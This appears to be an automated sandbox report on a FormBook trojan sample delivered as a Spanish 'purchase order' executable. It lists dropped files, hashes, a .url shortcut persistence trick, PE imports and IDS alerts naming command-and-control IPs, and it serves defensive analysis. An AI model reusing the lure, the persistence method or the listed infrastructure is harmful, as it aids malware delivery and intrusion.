SSDEEP:	6:Gl/AdJDJXXmx2aRCXRSGZ0dX4Pml7JxdX3Qn5GSoX:nXmfoAt4SjSo
MD5:	EFE1EF8D49A078356EF93D6F465D7A32
SHA1:	17C132ED446DEBD8624B6721350D8E1FD953DCA8
SHA-256:	BD093DB2C402E692989852B344F2E66546C31B1429354230A8EF02CF572FA10D
SHA-512:	AE6297DD17E7BED0F43E532CD2C8FCFED65DFDE8FDA143CD51490558548EBC0E42359B5DD90E1F339E89A55F3686746EED2B426F1C5F00FFBF91F19A3098F439
Malicious:	false
Reputation:	unknown
Preview:	..0 IMMM ...............e.................................................................................................................................................................................................................................................................................................................................................-.... .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:6:6
MD5:	379523B9F5D5B954E719B664846DBF8F
SHA1:	930823EC80B85EDD22BAF555CAD21CDF48F066AA
SHA-256:	3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
SHA-512:	ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:V/l/:/
MD5:	5F243BF7CC0A348B6D31460A91173E71
SHA1:	5696B34625F027EC01765FC2BE49EFCFD882BF8E
SHA-256:	1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
SHA-512:	9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:J:J
MD5:	DB7C049E5E4E336D76D5A744C28C54C8
SHA1:	A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
SHA-256:	E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
SHA-512:	B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Lxtcsmegwxhfqoabkjaduxyckamobho[1] Download File
Process:	C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe
File Type:	data
Category:	dropped
Size (bytes):	455680
Entropy (8bit):	7.916954617615425
Encrypted:	false
SSDEEP:	12288:YNlqhV4Q7IeSB4YdXzQ/eqOSY5M81pgzbY9:W5Qce8FdXzQ/zOSAGzbY9
MD5:	8242FB2442748493AA1D31DDA471D43A
SHA1:	FF086DF2DD002C2C7A2EF3F7E35F9E6C867B13D8
SHA-256:	A63F34045972805E93696C309CE34D7E285AB60D63BF9D3138662F8C3D2158CF
SHA-512:	56B7CE284761641289D320C06890996D4C7B3768E8E7F7D9A50E306FD2D3BACB5F0D36F9C55FE9099AF43293D205F7A996D1E8109CEE7ADF442423904575D699
Malicious:	false
Reputation:	unknown
Preview:	..:....+........k-.vT....s9.^......81.Z...."b..-.s<#......D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D..&\..V....ML.9...<\..u..Qza..`.k=..?.[.l..........<\..u..Qza..`.k=..0:>..$e........\|@/...zx[...`.k=..?.[.l..........<\..u..Qza..`.k=..0:>..$e........\|@/...zx[...`.k=..?.[.l..........<\..u..Qza..`.k=.....N.Mt..6.j...P..X....q..R.H5.l...J........\|N........KAQ..`..]...Y.#...U.v.`&...q...yo..<...1....3.......]..3&..IE.?..B.^..(......k..g.U...I.Nw9..C..o...Ww;~I..W.....{...a5.h7D....."..a.0u.]...K..J...\|H.-..e....F.d..R...5......7...........:..#....r..W.....YYa....Q.)...X.YX..Iu....\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Lxtcsmegwxhfqoabkjaduxyckamobho[1] Download File
Process:	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe
File Type:	data
Category:	dropped
Size (bytes):	455680
Entropy (8bit):	7.916954617615425
Encrypted:	false
SSDEEP:	12288:YNlqhV4Q7IeSB4YdXzQ/eqOSY5M81pgzbY9:W5Qce8FdXzQ/zOSAGzbY9
MD5:	8242FB2442748493AA1D31DDA471D43A
SHA1:	FF086DF2DD002C2C7A2EF3F7E35F9E6C867B13D8
SHA-256:	A63F34045972805E93696C309CE34D7E285AB60D63BF9D3138662F8C3D2158CF
SHA-512:	56B7CE284761641289D320C06890996D4C7B3768E8E7F7D9A50E306FD2D3BACB5F0D36F9C55FE9099AF43293D205F7A996D1E8109CEE7ADF442423904575D699
Malicious:	false
Reputation:	unknown
Preview:	..:....+........k-.vT....s9.^......81.Z...."b..-.s<#......D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D..&\..V....ML.9...<\..u..Qza..`.k=..?.[.l..........<\..u..Qza..`.k=..0:>..$e........\|@/...zx[...`.k=..?.[.l..........<\..u..Qza..`.k=..0:>..$e........\|@/...zx[...`.k=..?.[.l..........<\..u..Qza..`.k=.....N.Mt..6.j...P..X....q..R.H5.l...J........\|N........KAQ..`..]...Y.#...U.v.`&...q...yo..<...1....3.......]..3&..IE.?..B.^..(......k..g.U...I.Nw9..C..o...Ww;~I..W.....{...a5.h7D....."..a.0u.]...K..J...\|H.-..e....F.d..R...5......7...........:..#....r..W.....YYa....Q.)...X.YX..Iu....\.

C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe Download File
Process:	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	731136
Entropy (8bit):	7.188490514281361
Encrypted:	false
SSDEEP:	12288:wTDxfHlE1XHBC/qo3R7HaZRZEBTV3bXKRfwUCm0gRS+:w3RFIHBCN3hHWeBTwFcH
MD5:	DEEA7525A547ED7A9EF6C81B04478F3E
SHA1:	B29C935913A55C9BAD3979D05D97A6EBDA871604
SHA-256:	413E8DF7F149AA643AAA1EF70E953AB2112827B652F1CF05B6420ED6A119962D
SHA-512:	DDB161A25BDC6465DDBA19C8781773006E8CBF7B8E909AAE20EB4CC577B085C72D75BED40B0D4AB2363003759A344B1AAD2235381AB3C10043B3E47E2EE9F139
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................(...........:.......@....@..............................................@...........................P..,...............................l...................................................X...............................text............................... ..`.itext..\....0....... .............. ..`.data........@.......,..............@....bss.....7...............................idata..,*...P...,..................@....tls....4............ ...................rdata............... ..............@..@.reloc...l.......n..."..............@..B.rsrc...............................@..@.....................(..............@..@................................................................................................

C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Contacts\Lxtcsmeg\gemsctxL.url Download File
Process:	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Lxtcsmeg\\Lxtcsmeg.exe">), ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	97
Entropy (8bit):	4.673704698974188
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+Ro4EEb+gLVovsGKd5L:HRYFVmTWDKFAFVovsb5L
MD5:	044800E57050AACD91A8A05E3A9DF01F
SHA1:	6D0019CD0C037EFAA0CEC4BC72B1C038236AA54B
SHA-256:	939C88DEE69B3B7FD6CB3F82608BC640A2C28CD87D16EEE7AC057384BDF0F857
SHA-512:	F7F83793C9012FE2AC64EAA44B4F742E49938871A1E5ADBDE7E96F4DA5379BBBA510B6582869A657DB5761B479A510E758769176E5D9B101E92BE3196027904F
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\Lxtcsmeg\gemsctxL.url, Author: @itsreallynick (Nick Carr)
Reputation:	unknown
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\user\\Contacts\\Lxtcsmeg\\Lxtcsmeg.exe"..IconIndex=17..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.188490514281361
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Se adjunta el pedido, proforma.exe
File size:	731136
MD5:	deea7525a547ed7a9ef6c81b04478f3e
SHA1:	b29c935913a55c9bad3979d05d97a6ebda871604
SHA256:	413e8df7f149aa643aaa1ef70e953ab2112827b652f1cf05b6420ed6a119962d
SHA512:	ddb161a25bdc6465ddba19c8781773006e8cbf7b8e909aae20eb4cc577b085c72d75bed40b0d4ab2363003759a344b1aad2235381ab3c10043b3e47e2ee9f139
SSDEEP:	12288:wTDxfHlE1XHBC/qo3R7HaZRZEBTV3bXKRfwUCm0gRS+:w3RFIHBCN3hHWeBTwFcH
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	e0e6a3a6a4b8b880

Static PE Info

General
Entrypoint:	0x463a14
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d5a5a85102968ed0997ce91809ca5aad

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004628E4h
call 00007F97D8C02811h
mov eax, dword ptr [00480620h]
mov eax, dword ptr [eax]
call 00007F97D8C56071h
mov ecx, dword ptr [00480794h]
mov eax, dword ptr [00480620h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046267Ch]
call 00007F97D8C56071h
mov eax, dword ptr [00480620h]
mov eax, dword ptr [eax]
call 00007F97D8C560E5h
call 00007F97D8C00680h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85000	0x2a2c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x91000	0x29800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x6c08	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x89000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x85800	0x684	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x61ae4	0x61c00	False	0.527903212916	data	6.5405846718	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0x63000	0xa5c	0xc00	False	0.545572916667	data	5.72021737613	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x64000	0x1c7c0	0x1c800	False	0.0727196408991	data	6.80333446108	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x81000	0x37b4	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x85000	0x2a2c	0x2c00	False	0.309037642045	data	4.85929943167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x88000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0x18	0x200	False	0.05078125	data	0.210826267787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x6c08	0x6e00	False	0.623401988636	data	6.65899022232	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x91000	0x29800	0x29800	False	0.671004329819	data	7.24225864886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x91a5c	0x134	data	English	United States
RT_CURSOR	0x91b90	0x134	data	English	United States
RT_CURSOR	0x91cc4	0x134	data	English	United States
RT_CURSOR	0x91df8	0x134	data	English	United States
RT_CURSOR	0x91f2c	0x134	data	English	United States
RT_CURSOR	0x92060	0x134	data	English	United States
RT_CURSOR	0x92194	0x134	data	English	United States
RT_BITMAP	0x922c8	0x1d0	data	English	United States
RT_BITMAP	0x92498	0x1e4	data	English	United States
RT_BITMAP	0x9267c	0x1d0	data	English	United States
RT_BITMAP	0x9284c	0x1d0	data	English	United States
RT_BITMAP	0x92a1c	0x1d0	data	English	United States
RT_BITMAP	0x92bec	0x1d0	data	English	United States
RT_BITMAP	0x92dbc	0x23668	data	English	United States
RT_BITMAP	0xb6424	0x1d0	data	English	United States
RT_BITMAP	0xb65f4	0x1d0	data	English	United States
RT_BITMAP	0xb67c4	0x1d0	data	English	United States
RT_BITMAP	0xb6994	0x1d0	data	English	United States
RT_ICON	0xb6b64	0x2e8	data	Russian	Russia
RT_ICON	0xb6e4c	0x128	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_STRING	0xb6f74	0x3ac	data
RT_STRING	0xb7320	0x1c8	data
RT_STRING	0xb74e8	0xcc	data
RT_STRING	0xb75b4	0x114	data
RT_STRING	0xb76c8	0x350	data
RT_STRING	0xb7a18	0x3bc	data
RT_STRING	0xb7dd4	0x370	data
RT_STRING	0xb8144	0x3cc	data
RT_STRING	0xb8510	0x214	data
RT_STRING	0xb8724	0xcc	data
RT_STRING	0xb87f0	0x194	data
RT_STRING	0xb8984	0x3c4	data
RT_STRING	0xb8d48	0x338	data
RT_STRING	0xb9080	0x294	data
RT_RCDATA	0xb9314	0x10	data
RT_RCDATA	0xb9324	0x2a8	data
RT_RCDATA	0xb95cc	0xf50	Delphi compiled form 'TAboutForm'
RT_RCDATA	0xba51c	0x132	Delphi compiled form 'TBrowseForm'
RT_GROUP_CURSOR	0xba650	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xba664	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xba678	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xba68c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xba6a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xba6b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xba6c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xba6dc	0x22	data	Russian	Russia

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCBrushColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
crypt32	CertVerifyCertificateChainPolicy
crypt32	CertVerifyCertificateChainPolicy
uRL	InetIsOffline

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-16:53:40.619077	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	8.8.8.8
11/25/21-16:53:45.750115	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49848	37.123.118.150	192.168.2.4
11/25/21-16:53:51.508305	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49849	80	192.168.2.4	104.233.161.196
11/25/21-16:53:51.508305	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49849	80	192.168.2.4	104.233.161.196
11/25/21-16:53:51.508305	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49849	80	192.168.2.4	104.233.161.196
11/25/21-16:53:57.253457	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49850	80	192.168.2.4	85.194.202.138
11/25/21-16:53:57.253457	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49850	80	192.168.2.4	85.194.202.138
11/25/21-16:53:57.253457	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49850	80	192.168.2.4	85.194.202.138

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 16:51:20.519721985 CET	49759	443	192.168.2.4	162.159.134.233
Nov 25, 2021 16:51:20.519817114 CET	443	49759	162.159.134.233	192.168.2.4
Nov 25, 2021 16:51:20.519947052 CET	49759	443	192.168.2.4	162.159.134.233
Nov 25, 2021 16:51:20.545670033 CET	49759	443	192.168.2.4	162.159.134.233
Nov 25, 2021 16:51:20.545692921 CET	443	49759	162.159.134.233	192.168.2.4
Nov 25, 2021 16:51:20.598572969 CET	443	49759	162.159.134.233	192.168.2.4
Nov 25, 2021 16:51:20.598701000 CET	49759	443	192.168.2.4	162.159.134.233
Nov 25, 2021 16:51:20.917584896 CET	49759	443	192.168.2.4	162.159.134.233
Nov 25, 2021 16:51:20.917610884 CET	443	49759	162.159.134.233	192.168.2.4
Nov 25, 2021 16:51:20.917941093 CET	443	49759	162.159.134.233	192.168.2.4
Nov 25, 2021 16:51:20.918006897 CET	49759	443	192.168.2.4	162.159.134.233
